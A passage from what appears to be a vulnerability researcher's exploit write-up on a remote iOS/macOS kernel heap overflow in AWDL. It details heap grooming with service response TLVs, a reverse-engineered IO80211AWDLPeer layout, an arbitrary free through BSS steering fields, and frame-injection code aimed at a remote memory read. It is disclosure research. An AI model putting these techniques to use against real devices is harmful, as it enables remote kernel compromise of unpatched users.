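    if (p->channel == 6) {          /* 2.4GHz: goes straight to the front */
        p->next = *head;
        *head = p;
        return;
    }
    /* 5GHz: walk past every entry whose RSSI is at least as strong
     * (assumed comparison), then link the new peer in at that point. */
    struct list_peer **link = head;
    while (*link != NULL && (*link)->rssi >= p->rssi)
        link = &(*link)->next;
    p->next = *link;
    *link = p;
}
```

Under this model an attacker who controls the channel and the claimed signal strength of each spoofed peer can predict where in the list that peer will land.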

The second requirement is to be able to allocate arbitrary, safe objects. Our ideal heap grooming/shaping objects would have the following primitives:

1) arbitrary size

2) unlimited allocation quantity

3) allocation has no side effects

4) controlled contents

5) contents can be safely corrupted

6) can be free’d at an arbitrary, controlled point, with no side effects

Of course, we’re completely limited to objects we can force to be allocated remotely via AWDL so all the tricks from local kernel exploitation don’t work. For example, I and others have used various forms of mach messages, unix pipe buffers, OSDictionaries, IOSurfaces and more to build these primitives. None of these are going to work at all. AWDL is sufficiently complicated however that after some reversing I found a pretty good candidate object.

This is my reverse-engineered definition of the services response descriptor TLV (type 2):

{ u8  type
  u16 len
  u16 key_len
  u8  key_val[key_len]
  u16 value_total_size
  u16 fragment_offset
  u8  fragment[len-key_len-6] }

It has two variable-sized fields: key_val and fragment. The key_len field defines the length of the key_val buffer, and the length of fragment is the remaining space left at the end of the TLV. The parser for this TLV makes a kalloc allocation of value_total_size bytes, an arbitrary u16. It then memcpy’s from fragment into that kalloc buffer at offset fragment_offset:

The service_response technique gives us a powerful heap grooming primitive

I believe this is supposed to be support for receiving out-of-order fragments of service request responses. It gives us a very powerful primitive for heap grooming. We can choose an arbitrary allocation size up to 64k and write an arbitrary amount of controlled data to an arbitrary offset in that allocation and we only need to provide the offset and content bytes.
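
As a rough user-space model of that behaviour, the sketch below parses the TLV layout given above and performs the allocate-then-copy step with calloc standing in for kalloc. The names srd_parse, srd_alloc and rd16 are hypothetical, little-endian field encoding is an assumption, and the bounds checks are the sketch’s own rather than a claim about what the kernel parser verifies.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct srd_alloc {
    uint8_t *buf;     /* stands in for the kalloc'd value buffer */
    uint16_t size;    /* value_total_size taken from the TLV */
};

static uint16_t rd16(const uint8_t *p)   /* little-endian: an assumption */
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Returns 0 on success, -1 if the TLV is malformed. */
static int srd_parse(const uint8_t *tlv, size_t tlv_size, struct srd_alloc *out)
{
    assert(tlv != NULL && out != NULL);
    if (tlv_size < 5) return -1;                  /* type + len + key_len */
    uint16_t len = rd16(tlv + 1);
    uint16_t key_len = rd16(tlv + 3);
    if ((size_t)len + 3 > tlv_size) return -1;    /* len counts bytes after the header */
    if ((size_t)key_len + 6 > len) return -1;     /* fixed fields must fit */

    const uint8_t *p = tlv + 5 + key_len;         /* skip key_val */
    uint16_t value_total_size = rd16(p);
    uint16_t fragment_offset = rd16(p + 2);
    const uint8_t *fragment = p + 4;
    size_t fragment_len = (size_t)len - key_len - 6;
    if ((size_t)fragment_offset + fragment_len > value_total_size) return -1;

    out->buf = calloc(1, value_total_size ? value_total_size : 1);
    if (out->buf == NULL) return -1;
    out->size = value_total_size;
    memcpy(out->buf + fragment_offset, fragment, fragment_len);
    return 0;
}
```

The sender pays only for the fragment bytes it transmits, while the receiver allocates the full value_total_size, which is what makes the object attractive for grooming.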

This also gives us a kind of amplification primitive. We can bundle quite a lot of these TLVs in one frame allowing us to make megabytes of controlled heap allocations with minimal side effects in just one AWDL frame.

This SRD technique in fact almost completely meets criteria 1-5 outlined above. It’s almost perfect apart from one crucial point; how can we free these allocations?

Through static reversing I couldn’t find how these allocations would be free’d, so I wrote a dtrace script to help me find when those exact kalloc allocations were free’d. Running this dtrace script then running a test AWDL client sending SRDs I saw the allocation but never the free. Even disabling the AWDL interface, which should clean up most of the outstanding AWDL state, doesn’t cause the allocation to be freed.

This is possibly a bug in my dtrace script, but there’s another theory: I wrote another test client which allocated a huge number of SRDs. This allocated a substantial amount of memory, enough to be visible using zprint. And indeed, running that test client repeatedly then running zprint you can observe the inuse count of the target zone getting larger and larger. Disabling AWDL doesn’t help, neither does waiting overnight. This looks like a pretty trivial memory leak.

Later on we’ll examine the cause of this memory leak but for now we have a heap allocation primitive which meets criteria 1-5, that’s probably good enough!

I managed to build a heap groom which gets the linked-list and heap objects set up such that I can overflow into the second-to-last peer object to be processed:

By surrounding peer objects with a sufficient number of safe objects we can ensure that the linear corruption either hits the right peer object or a safe object

The trick is to ensure that the ratio of safe objects to peers is sufficiently high that you can be (reasonably) sure that the two target peers will only be next to each other or next to safe objects (they won’t be next to other peers in the list.) Even though you may not be able to force the two peers to be in the correct order as shown in the diagram, you can at least make the corruption safe if they aren’t, then try again.

When writing the code to build the SyncTree TLV I realized I’d made a huge oversight…

My initial idea had been to only partially overwrite a valid linked-list pointer element:

If we could partially overflow the peer_list_flink pointer we could potentially move it to point it somewhere nearby. In this illustration by moving it down by 8 bytes we could potentially get some bytes of a peer_list_blink added to the peer MACs bloom filter. A partial overwrite doesn’t directly give a relative add or subtract primitive, but with some heap grooming overwriting the lower 2 bytes can yield something similar

But when you actually look more closely at the memory layout taking into account the limitations of the corruption primitive:

Computing the relative offsets between two IO80211AWDLPeers next to each other in memory it turns out that a useful partial overwrite of peer_list_flink isn’t possible as it lies on a 6-byte boundary from the lower peer’s sync_tree_macs array

This is not a useful type of partial overwrite and it took a lot of effort to make this heap groom work only to realize in hindsight this obvious oversight.
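
The arithmetic behind that oversight can be checked with a few lines of C. This sketch makes several assumptions: it uses the iOS 13.3 field offsets from the structure definition given later in this post (the analysis at this stage was done on iOS 12 beta 1, where offsets may differ), it assumes adjacent peers sit 6144 bytes apart as kalloc.6144 elements, and it assumes the overflow writes whole 6-byte MAC entries from the start of sync_tree_macs. The helper names are mine.

```c
#include <assert.h>
#include <stddef.h>

enum {
    ELEM_SIZE          = 6144,   /* kalloc.6144 element size */
    SYNC_TREE_MACS_OFF = 0x1648, /* offset of sync_tree_macs in the peer */
    FLINK_OFF          = 0x10,   /* offset of peer_list_flink in the peer */
    MAC_LEN            = 6
};

/* Bytes from the start of sync_tree_macs to a field in the next element. */
static size_t distance_to_next(size_t field_off)
{
    assert(field_off < ELEM_SIZE);
    return (size_t)ELEM_SIZE - SYNC_TREE_MACS_OFF + field_off;
}

/* How many bytes of an 8-byte field starting `dist` bytes into the copy
 * are overwritten when n_macs whole MAC entries are written. */
static size_t bytes_clobbered(size_t dist, size_t n_macs)
{
    size_t end = n_macs * MAC_LEN;
    if (end <= dist) return 0;
    size_t over = end - dist;
    return over > 8 ? 8 : over;
}
```

With these numbers the next peer’s flink starts 456 bytes into the copy, an exact multiple of 6, so the overflow can touch 0, 6 or all 8 bytes of the pointer but never just its lowest one or two bytes.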

Attempting to salvage something from all this work I tried instead to just completely overwrite the linked-list pointer. We’d still need some other vulnerability or technique to determine what we should overwrite with but it would at least be some progress to see a read or write from a controlled address.

Alas, whilst I’m able to do the overflow, it appears that the linked-list of peers is being continuously traversed in the background even when there’s no AWDL traffic and virtual methods are being called on each peer. This will make things significantly harder without first knowing a vtable pointer.

Another option would be to trigger the SyncTree overflow twice during the parsing of a single frame. Recall the code in actionFrameReport:

IO80211AWDLPeer::actionFrameReport
      case 0x14:
        if (tlv_cnt[0x14] >= 2)
          goto ERR;
        tlv_cnt[0x14]++;
        this->parseAwdlSyncTreeTLV(bytes);

I explored places where a TLV would trigger a peer list traversal. The idea would then be to sandwich a controlled lookup between two SyncTree TLVs, the first to corrupt the list and the second to somehow make that safe. There were some code paths like this, where we could cause a controlled peer to be looked up in the peer list. There were even some places where we could potentially get a different memory corruption primitive from this but they seemed even trickier to exploit. And even then you’d not be able to reset the peer list pointer with the second overflow anyway.

Thus far none of my ideas for a read panned out; messing with the linked list without a correctly PAC’d vtable pointer just doesn’t seem feasible. At this point I’d probably consider looking for a second vulnerability. For example, in Natalie’s recent WebRTC exploit she was able to find a second vulnerability to defeat ASLR.

There are still some other ideas left open but they seem tricky to get right:

The other major type of object in the kalloc.6144 zone are ipc_kmsg’s for some IOKit methods. These are in-flight mach messages and it might be possible to corrupt them such that we could inject arbitrary mach messages into userspace. This idea seems mostly to create new challenges rather than solve any open ones though.

If we don’t target the same zone then we could try a cross-zone attack, but even then we’re quite limited by the primitives offered by AWDL. There just aren’t that many interesting objects we can allocate and manipulate.

By this point I’ve invested a lot of time into this project and am not willing to give up. I’ve also been hearing very faint whispers that I might have accidentally stumbled upon an attack surface which is being actively exploited. Time to try one more thing…

Up until this point I’d been doing most of my reversing using the partially symbolized iOS 12 beta 1 kernelcache. I had done a considerable amount of reverse engineering to build up a reasonable idea of all the fields in the IO80211AWDLPeer object which I could corrupt and it wasn’t looking promising. But this vulnerability was only going to get patched in iOS 13.3.1.

Could they have added new fields in iOS 13? It seemed unlikely but of course worth a look.

Here’s my reverse-engineered structure definition for IO80211AWDLPeer in iOS 13.3/MacOS 10.15.2:

struct __attribute__((packed)) __attribute__((aligned(4))) IO80211AWDLPeer {
/* +0x0000 */  void *vtable;
/* +0x0008 */  uint32_t ref_cnt;
/* +0x000C */  uint32_t bucket;
/* +0x0010 */  void *peer_list_flink;
/* +0x0018 */  void *peer_list_blink;
/* +0x0020 */  struct ether_addr peer_mac;
/* +0x0026 */  uint8_t pad1[2];
/* +0x0028 */  struct IO80211AWDLPeerManager *peer_manager;
/* +0x0030 */  uint8_t pad8[384];
/* +0x01B0 */  uint16_t HT_FLAGS;
/* +0x01B2 */  uint8_t HT_features[26];
/* +0x01CC */  uint8_t HT_caps;
/* +0x01CD */  uint8_t pad10[14];
/* +0x01DB */  uint8_t VHT_caps;
/* +0x01DC */  uint8_t pad9[732];
/* +0x04B8 */  uint8_t added_to_fw_cache;
/* +0x04B9 */  uint8_t is_on_correct_infra_channel;
/* +0x04BA */  uint8_t pad0[6];
/* +0x04C0 */  uint32_t nsync_total_len;
/* +0x04C4 */  uint8_t nsync_tlv_buf[64];
/* +0x0504 */  uint32_t flags_from_dp_tlv;
/* +0x0508 */  uint8_t pad14[19];
/* +0x051B */  uint32_t n_sync_tree_macs;
/* +0x051F */  uint8_t pad20[126];
/* +0x059D */  uint8_t peer_infra_channel;
/* +0x059E */  struct ether_addr peer_infra_mac;
/* +0x05A4 */  struct ether_addr some_other_mac;
/* +0x05AA */  uint8_t country_code[3];
/* +0x05AD */  uint8_t pad5[41];
/* +0x05D6 */  uint16_t social_channels;
/* +0x05D8 */  uint64_t last_AF_timestamp;
/* +0x05E0 */  uint8_t pad17[116];
/* +0x0654 */  uint8_t chanseq_encoding;
/* +0x0655 */  uint8_t chanseq_count;
/* +0x0656 */  uint8_t chanseq_step_count;
/* +0x0657 */  uint8_t chanseq_dup_count;
/* +0x0658 */  uint8_t pad19[4];
/* +0x065C */  uint16_t chanseq_fill_channel;
/* +0x065E */  uint8_t chanseq_channels[32];
/* +0x067E */  uint8_t pad2[64];
/* +0x06BE */  uint8_t raw_chanseq[64];
/* +0x06FE */  uint8_t pad18[194];
/* +0x07C0 */  uint64_t last_UMI_update_timestamp;
/* +0x07C8 */  struct IO80211AWDLPeer *UMI_chain_flink;
/* +0x07D0 */  uint8_t pad16[8];
/* +0x07D8 */  uint8_t is_in_umichain;
/* +0x07D9 */  uint8_t pad15[79];
/* +0x0828 */  uint8_t datapath_tlv_flags_bit_5_dualband;
/* +0x0829 */  uint8_t pad12[2];
/* +0x082B */  uint8_t SDB_mode;
/* +0x082C */  uint8_t pad6[28];
/* +0x0848 */  uint8_t did_parse_datapath_tlv;
/* +0x0849 */  uint8_t pad7[1011];
/* +0x0C3C */  uint32_t UMI_feature_mask;
/* +0x0C40 */  uint8_t pad22[2568];
/* +0x1648 */  struct ether_addr sync_tree_macs[10]; // overflowable
/* +0x1684 */  uint8_t sync_error_count;
/* +0x1685 */  uint8_t had_chanseq_tlv;
/* +0x1686 */  uint8_t pad3[2];
/* +0x1688 */  uint64_t per_second_timestamp;
/* +0x1690 */  uint32_t n_frames_in_last_second;
/* +0x1694 */  uint8_t pad21[4];
/* +0x1698 */  void *steering_msg_blob;  // NEW FIELD
/* +0x16A0 */  uint32_t steering_msg_blob_size;  // NEW FIELD
};

The layout of fields in my reverse-engineered version of IO80211AWDLPeer. You can define and edit structures in C-syntax like this using the Local Types window in IDA: right-clicking a type and selecting “Edit…” brings up an interactive edit window; it’s very helpful for reversing complex data structures such as this.

There are new fields! In fact, there’s a new pointer field and length field right at the end of the IO80211AWDLPeer object. But what is a steering_msg_blob? What is BSS Steering?

Let’s take a look at where the steering_msg_blob pointer is used.

It’s allocated in IO80211AWDLPeer::populateBssSteeringMsgBlob, via the following call stack:

IO80211PeerBssSteeringManager::processPostSyncEvaluation

IO80211PeerBssSteeringManager::bssSteeringStateMachine

bssSteeringStateMachine is called from many places, including IO80211AWDLPeer::actionFrameReport when it parses a BSS Steering TLV (type 0x1d), so it seems like we can indeed drive this state machine remotely somehow.

The steering_msg_blob pointer is freed in IO80211AWDLPeer::freeResources when the IO80211AWDLPeer object is destroyed:

  steering_msg_blob = this->steering_msg_blob;
  if ( steering_msg_blob )
  {
    kfree(steering_msg_blob, this->steering_msg_blob_size);

This gives us our first new primitive: an arbitrary free. Without needing to reverse any of the BSS Steering code we can quite easily overflow from the sync_tree_macs field into the steering_msg_blob and steering_msg_blob_size fields, setting them to arbitrary values.

If we then wait for the peer to timeout and be destroyed, when ::freeResources is called it will call kfree with our arbitrary pointer and size.
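
How far the overflow has to run to reach those two fields follows directly from the offsets in the structure definition above. The sketch below is just that arithmetic; the helper names are mine, and it assumes the copy starts at the beginning of sync_tree_macs and proceeds in whole 6-byte MAC entries.

```c
#include <assert.h>
#include <stddef.h>

enum {
    SYNC_TREE_MACS_OFF     = 0x1648,
    STEERING_BLOB_OFF      = 0x1698,
    STEERING_BLOB_SIZE_OFF = 0x16A0,
    MAC_LEN                = 6
};

/* Position of a later field relative to the start of the copy. */
static size_t offset_in_copy(size_t field_off)
{
    assert(field_off >= SYNC_TREE_MACS_OFF);
    return field_off - SYNC_TREE_MACS_OFF;
}

/* Number of whole MAC entries needed to fully cover a field. */
static size_t macs_to_cover(size_t field_off, size_t field_size)
{
    size_t end = offset_in_copy(field_off) + field_size;
    return (end + MAC_LEN - 1) / MAC_LEN;   /* round up */
}
```

By this reckoning steering_msg_blob begins 80 bytes into the copy and covering both fields takes 16 MAC entries, against a buffer sized for 10. Every field in between (sync_error_count, per_second_timestamp and so on) is overwritten along the way.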

The steering_msg_blob is also used in one other place:

In IO80211AWDLPeerManager::handleUmiTimer the IO80211AWDLPeerManager walks a linked-list of peers (a separate linked-list from that used to store all the peers) and from each of the peers in that list it checks whether that peer and the current device are on the same channel and in an availability window:

if ( peer_manager->current_channel_ == peer->chanseq_channels[peer_manager->current_chanseq_step] ) {

If the UMI timer has indeed fired when both this device and the peer from the UMI list are on the same channel in an overlapping availability window then the IO80211AWDLPeerManager removes the peer from the UMI list, reads the bss_steering_blob from the peer and passes it as the last argument to the peer’s ::sendUnicastMI method.

This passes that blob to IO80211AWDLPeerManager::buildMasterIndicationTemplate to build an AWDL master indication frame before attempting to transmit it.

Let’s look at how buildMasterIndicationTemplate uses the steering_msg_blob:

The third argument to buildMasterIndicationTemplate is is_unicast_MI which indicates whether this method was called by IO80211AWDLPeerManager::sendUnicastMI (which sets it to 1) or IO80211AWDLPeerManager::updatePrimaryPayloadMI (which sets it to 0.)

If buildMasterIndicationTemplate was called to build a unicast MI frame and the peer’s feature_mask field has bit 0xD set then the steering_msg_blob will be passed to IO80211AWDLPeerManager::buildMultiPeerBssSteeringTlv. This method reads a size from the second dword in the steering_msg_blob and checks whether it is smaller than the remaining space in the frame template buffer; if it is, then that size value is used to copy that number of bytes from the steering_msg_blob pointer into a TLV (type 0x1d) in the template frame which will then be sent out over the air!
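
The copy logic described there can be sketched as below. This is a user-space model based only on the description in the text: the function names are hypothetical, little-endian byte order is assumed, and the TLV header that the real code writes before the payload is left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* The size lives in the second dword of the blob (byte offset 4). */
static uint32_t blob_declared_size(const uint8_t *blob)
{
    assert(blob != NULL);
    return (uint32_t)blob[4] | ((uint32_t)blob[5] << 8) |
           ((uint32_t)blob[6] << 16) | ((uint32_t)blob[7] << 24);
}

/* Copies the blob into frame if it fits; returns bytes copied, or 0. */
static size_t append_steering_blob(const uint8_t *blob, uint8_t *frame,
                                   size_t remaining)
{
    uint32_t size = blob_declared_size(blob);
    if (size >= remaining)
        return 0;              /* must be smaller than the space left */
    memcpy(frame, blob, size); /* length comes from the blob itself */
    return size;
}
```

The point to notice is that the length is taken from the memory the pointer refers to. If the pointer is attacker-controlled, whatever dword sits 4 bytes past the target address decides how much memory ends up in the outgoing frame, which is why the read is only semi-arbitrary.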

There’s clearly a path here to get a semi-arbitrary read; but actually triggering this will require quite a lot more reversing. We need the UMI timer to be firing and we also need to get a peer into the UMI linked list.

At this point a sensible question to ask is, what exactly is BSS Steering? A bit of googling tells us that it’s part of 802.11v; a set of management standards for enterprise networks. One of the advanced features of enterprise networks is the ability to seamlessly move devices between different access points which form part of the same network; for example when you walk around the office with your phone or if there are too many devices associated with one access point. AWDL isn’t part of 802.11v. My best guess as to what’s going on here is that AWDL is driving the 802.11v AP roaming code to try to move AWDL clients on to a common infrastructure network. I think this code was added to support Sidecar, but everything below is based only on static reversing.

IO80211PeerBssSteeringManager::bssSteeringStateMachine is responsible for driving the BSS steering state machine. The first argument is a bssSteeringEvent enum value representing an event which the state machine should process. Using the IO80211PeerBssSteeringManager::getEventName method we can determine the names for all the events which the state machine will process and using the IO80211PeerBssSteeringManager::getStateName method we can determine the names of the states which the state machine can be in. Again using the local types window in IDA we can define enums for these which will make the HexRays decompiler output much more readable:

enum BSSSteeringState
{
  BSS_STEERING_STATE_IDLE = 0x0,
  BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL = 0x1,
  BSS_STEERING_STATE_ASSOCIATION_ONGOING = 0x2,
  BSS_STEERING_STATE_TX_CONFIRM_AWAIT = 0x3,
  BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT = 0x4,
  BSS_STEERING_STATE_STEERING_SYNCED = 0x5,
  BSS_STEERING_STATE_STEERING_SYNC_FAILED = 0x6,
  BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING = 0x7,
  BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL = 0x8,
  BSS_STEERING_STATE_SUSPEND = 0x9,
  BSS_STEERING_INVALID = 0xA,
};

enum bssSteeringEvent
{
  BSS_STEERING_MODE_ENABLE = 0x0,
  BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD = 0x1,
  BSS_STEERING_DO_PRESYNC_EVAL = 0x2,
  BSS_STEERING_PRESYNC_EVAL_DONE = 0x3,
  BSS_STEERING_SELF_INFRA_LINK_CHANGED = 0x4,
  BSS_STEERING_DIRECTED_STEERING_CMD_SENT = 0x5,
  BSS_STEERING_DIRECTED_STEERING_TX_CONFIRM_RXED = 0x6,
  BSS_STEERING_SYNC_CONFIRM_ATTEMPT = 0x7,
  BSS_STEERING_SYNC_SUCCESS_EVENT = 0x8,
  BSS_STEERING_SYNC_FAILED_EVENT = 0x9,
  BSS_STEERING_OVERALL_STEERING_TIMEOUT = 0xA,
  BSS_STEERING_DISABLE_EVENT = 0xB,
  BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT = 0xC,
  BSS_STEERING_SELF_STEERING_REQUESTED = 0xD,
  BSS_STEERING_SELF_STEERING_DONE = 0xE,
  BSS_STEERING_SUSPEND_EVENT = 0xF,
  BSS_STEERING_RESUME_EVENT = 0x10,
  BSS_STEERING_REMOTE_STEERING_TRIGGER = 0x11,
  BSS_STEERING_PEER_INFRA_LINK_CHANGED = 0x12,
  BSS_STEERING_REMOTE_STEERING_FAILED_EVENT = 0x13,
  BSS_STEERING_INVALID_EVENT = 0x14,
};

The current state is maintained in a steering context object, owned by the IO80211PeerBssSteeringManager. Reverse engineering the state machine code we can come up with the following rough definition for the steering context object:

struct __attribute__((packed)) BssSteeringCntx
{
  uint32_t first_field;
  uint32_t service_type;
  uint32_t peer_count;
  uint32_t role;
  struct ether_addr peer_macs[8];
  struct ether_addr infraBSSID;
  uint8_t pad4[6];
  uint32_t infra_channel_from_datapath_tlv;
  uint8_t pad8[8];
  char ssid[32];
  uint8_t pad1[12];
  uint32_t num_peers_added_to_umi;
  uint8_t pad_10;
  uint8_t pendingTransitionToNewState;
  uint8_t pad7[2];
  enum BSSSteeringState current_state;
  uint8_t pad5[8];
  struct IOTimerEventSource *bssSteeringExpiryTimer;
  struct IOTimerEventSource *bssSteeringStageExpiryTimer;
  uint8_t pad9[8];
  uint32_t steering_policy;
  uint8_t inProgress;
};

Our goal here is to reach IO80211AWDLPeer::populateBssSteeringMsgBlob which is called by IO80211PeerBssSteeringManager::processPostSyncEvaluation which is called when the state machine is in the BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL state and receives the BSS_STEERING_PRESYNC_EVAL_DONE event.

Each time a state is evaluated it can change the current state and optionally set the stateMachineTriggeredEvent variable to a new event and set sendEventToNewState to 1. This way the state machine can drive itself forwards to a new state. Let’s try to find the path to our target state:

The state machine begins in BSS_STEERING_STATE_IDLE. When we send the BSS steering TLV for the first time this injects either the BSS_STEERING_REMOTE_STEERING_TRIGGER or BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD event depending on whether the steeringMsgID in the TLV was 6 or 0.

This causes a call to IO80211PeerBssSteeringManager::processBssSteeringEnabled which parses a steering_msg structure which itself was parsed from the BSS steering TLV; we’ll take a look at both of those in a moment. If the steering manager is happy with the contents of the steering_msg structure from the TLV it starts two IOTimerEventSources: the bssSteeringExpiryTimer and the bssSteeringStageExpiryTimer. The SteeringExpiry timer will abort the entire steering process when it triggers, which happens after a few seconds. The StageExpiry timer allows the state machine to make progress asynchronously. When it expires it will call the IO80211PeerBssSteeringManager::bssSteeringStageExpiryTimerHandler function, a snippet of which is shown here:

  cntx=this->steering_cntx;

  if ( cntx && cntx->pendingTransitionToNewState )

  {

    current_state=cntx->current_state;

    switch ( current_state )

    {

      case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

        event=BSS_STEERING_DO_PRESYNC_EVAL;

        break;

      case BSS_STEERING_STATE_ASSOCIATION_ONGOING:

      case BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING:

        event=BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT;

        break;

      case BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT:

        event=BSS_STEERING_SYNC_CONFIRM_ATTEMPT;

        break;

      default:

        goto ERR;

    }

    result=this->bssSteeringStateMachine(this, event, …

We can see here the four state transitions which can happen asynchronously in the background when the StageExpiry timer fires and causes events to be injected.

From BSS_STEERING_STATE_IDLE, after the timers are initialized the code sets the pendingTransitionToNewState flag and updates the state to BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

  this->steering_cntx->pendingTransitionToNewState=1;

  state=BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL;

We can now see that this will cause the BSS_STEERING_DO_PRESYNC_EVAL event to be injected into the steering state machine and we reach the following code:

  case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

   {

     if ( EVENT==BSS_STEERING_DO_PRESYNC_EVAL ) {

       steering_policy=this->processPreSyncEvaluation(cntx);

       …

Here the BSS steering TLV gets parsed and reformatted into a format suitable for the BSS steering code; presumably this is the compatibility layer between the 802.11v enterprise WiFi BSS steering code and AWDL.

We need IO80211PeerBssSteeringManager::processPreSyncEvaluation to return a steering_policy value of 7. The code which determines this is very complicated; in the end it seems that if the target device is currently connected to a 5GHz network on a non-DFS channel then we can get it to return the right steering policy value to reach BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL. DFS channels are dynamic and can be disabled at runtime if radar is detected. There is no requirement that the attacker is also on the same 5GHz network. There may also be another path to reach the required state but this will do.

At this point we finally reach processPostSyncEvaluation and the steeringMsgBlob will be allocated and the UMI timer armed. When it starts firing the code will attempt to read the steering_msg_blob pointer and send the buffer it points to over the air.
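The path through the state machine described above can be summarised with a toy model. This is only a sketch: the state and event names are shortened from the ones in the text, their numeric values are placeholders, and two details are assumptions rather than reversed behaviour: that the machine injects BSS_STEERING_PRESYNC_EVAL_DONE into itself once the policy value is 7, and that any other policy value simply stops progress.

```c
#include <stdint.h>

/* Only the states and events named in the text; values are placeholders. */
enum state { ST_IDLE, ST_PRE_STEERING_SYNC_EVAL, ST_STEERING_SYNC_POST_EVAL, ST_STOPPED };
enum event { EV_NONE, EV_REMOTE_STEERING_TRIGGER, EV_DO_PRESYNC_EVAL, EV_PRESYNC_EVAL_DONE };

struct steering_sm {
    enum state current_state;
    int pending_transition;   /* models pendingTransitionToNewState */
    int blob_populated;       /* set once the post-sync evaluation step runs */
};

/* One evaluation step. The return value models the self-injected event
 * (stateMachineTriggeredEvent with sendEventToNewState set), or EV_NONE. */
static enum event sm_step(struct steering_sm *sm, enum event ev, uint32_t steering_policy)
{
    switch (sm->current_state) {
    case ST_IDLE:
        if (ev == EV_REMOTE_STEERING_TRIGGER) {
            sm->pending_transition = 1;
            sm->current_state = ST_PRE_STEERING_SYNC_EVAL;
        }
        return EV_NONE;   /* further progress waits for the stage expiry timer */
    case ST_PRE_STEERING_SYNC_EVAL:
        if (ev == EV_DO_PRESYNC_EVAL) {
            if (steering_policy == 7) {
                sm->current_state = ST_STEERING_SYNC_POST_EVAL;
                return EV_PRESYNC_EVAL_DONE;   /* assumed self-injection */
            }
            sm->current_state = ST_STOPPED;    /* assumed failure handling */
        }
        return EV_NONE;
    case ST_STEERING_SYNC_POST_EVAL:
        if (ev == EV_PRESYNC_EVAL_DONE)
            sm->blob_populated = 1;            /* populateBssSteeringMsgBlob reached */
        return EV_NONE;
    default:
        return EV_NONE;
    }
}

/* Models the stage expiry timer handler for the one state used here. */
static enum event sm_stage_timer(const struct steering_sm *sm)
{
    if (sm->pending_transition && sm->current_state == ST_PRE_STEERING_SYNC_EVAL)
        return EV_DO_PRESYNC_EVAL;
    return EV_NONE;
}

/* Drives the model from the first steering TLV; returns 1 if the blob step is reached. */
static int sm_run(uint32_t steering_policy)
{
    struct steering_sm sm = { ST_IDLE, 0, 0 };
    (void)sm_step(&sm, EV_REMOTE_STEERING_TRIGGER, steering_policy);
    enum event ev = sm_stage_timer(&sm);
    while (ev != EV_NONE)
        ev = sm_step(&sm, ev, steering_policy);
    return sm.blob_populated;
}
```

In this model `sm_run(7)` reaches the blob allocation step and any other policy value does not, which mirrors the requirement on processPreSyncEvaluation.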

Let's look concretely at what's required for the read:

We need two spoofer peers:

struct ether_addr reader_peer=*(ether_aton("22:22:aa:22:00:00"));

struct ether_addr steerer_peer=*(ether_aton("22:22:bb:22:00:00"));

The target device needs to be aware of both these peers so we allocate the reader peer by spoofing a frame from it:

inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       CHAN_SEQ_EMPTY(),

       HT_CAPS(),

       UNICAST_DATAPATH(0x1307 | 0x800),

       PKT_END());

There are two important things here:

1) This peer will have a channel sequence which is empty; this is important as it means we can enforce a gap between the allocation of the steering_msg_blob by processPostSyncEvaluation and its use in the UMI timer. Recall that we saw earlier that the unicast MI template only gets built when the UMI timer fires during a peer availability window; if the peer has no availability windows, then the template won't be updated and the steering_msg_blob won't be used. We can easily change the channel sequence later by sending a different TLV.

2) The flags in the UNICAST_DATAPATH TLV. That 0x800 is very important; without it this happens:

This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL

We'll get to that…

The next step is to allocate the steerer_peer and start steering the reader:

inject(RT(),

      WIFI(dst, steerer_peer),

      AWDL(),

      SYNC_PARAMS(),

      HT_CAPS(),

      UNICAST_DATAPATH(0x1307),

      BSS_STEERING(&reader_peer, 1),

      PKT_END());

Let's look at the bss_steering TLV:

struct bss_steering_tlv {

  uint8_t type;

  uint16_t length;

  uint32_t steeringMsgID;

  uint32_t steeringMsgLen;

  uint32_t peer_count;

  struct ether_addr peer_macs[8];

  struct ether_addr BSSID;

  uint32_t steeringTimeoutThreshold;

  uint32_t SSID_len;

  uint8_t infra_channel;

  uint32_t steeringCmdFlags;

  char SSID[32];

} __attribute__((packed));

We need to carefully choose these values; the important part for the exploit however is that we can specify up to 8 peers to be steered at the same time. For this example we'll just steer one peer. Here we build a bss_steering_tlv with only one peer_mac, set to the MAC address of reader_peer. If we have set everything up correctly this should cause the IO80211AWDLPeer object for reader_peer to allocate a steering_msg_blob and start the UMI timer firing, trying to send that blob in a UMI.
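As a rough illustration of the single-peer case, the sketch below fills in only the fields the text talks about. The struct layout is the one shown above; `struct mac_addr` is a local stand-in for `struct ether_addr`, the helper name is hypothetical, the TLV type number is left as a parameter because it is not given here, and the `sizeof - 3` length convention is assumed by analogy with the service_response TLV used later in this post. Every other field is left at zero as a placeholder and would need a carefully chosen real value.

```c
#include <stdint.h>
#include <string.h>

struct mac_addr { uint8_t octet[6]; };   /* stand-in for struct ether_addr */

struct bss_steering_tlv {
    uint8_t  type;
    uint16_t length;
    uint32_t steeringMsgID;
    uint32_t steeringMsgLen;
    uint32_t peer_count;
    struct mac_addr peer_macs[8];
    struct mac_addr BSSID;
    uint32_t steeringTimeoutThreshold;
    uint32_t SSID_len;
    uint8_t  infra_channel;
    uint32_t steeringCmdFlags;
    char     SSID[32];
} __attribute__((packed));

/* Hypothetical helper: steer exactly one peer. Multi-byte fields are written
 * in host byte order, so this assumes a little-endian build machine. */
static struct bss_steering_tlv make_single_peer_steering_tlv(uint8_t tlv_type,
                                                             const struct mac_addr *peer)
{
    struct bss_steering_tlv tlv;
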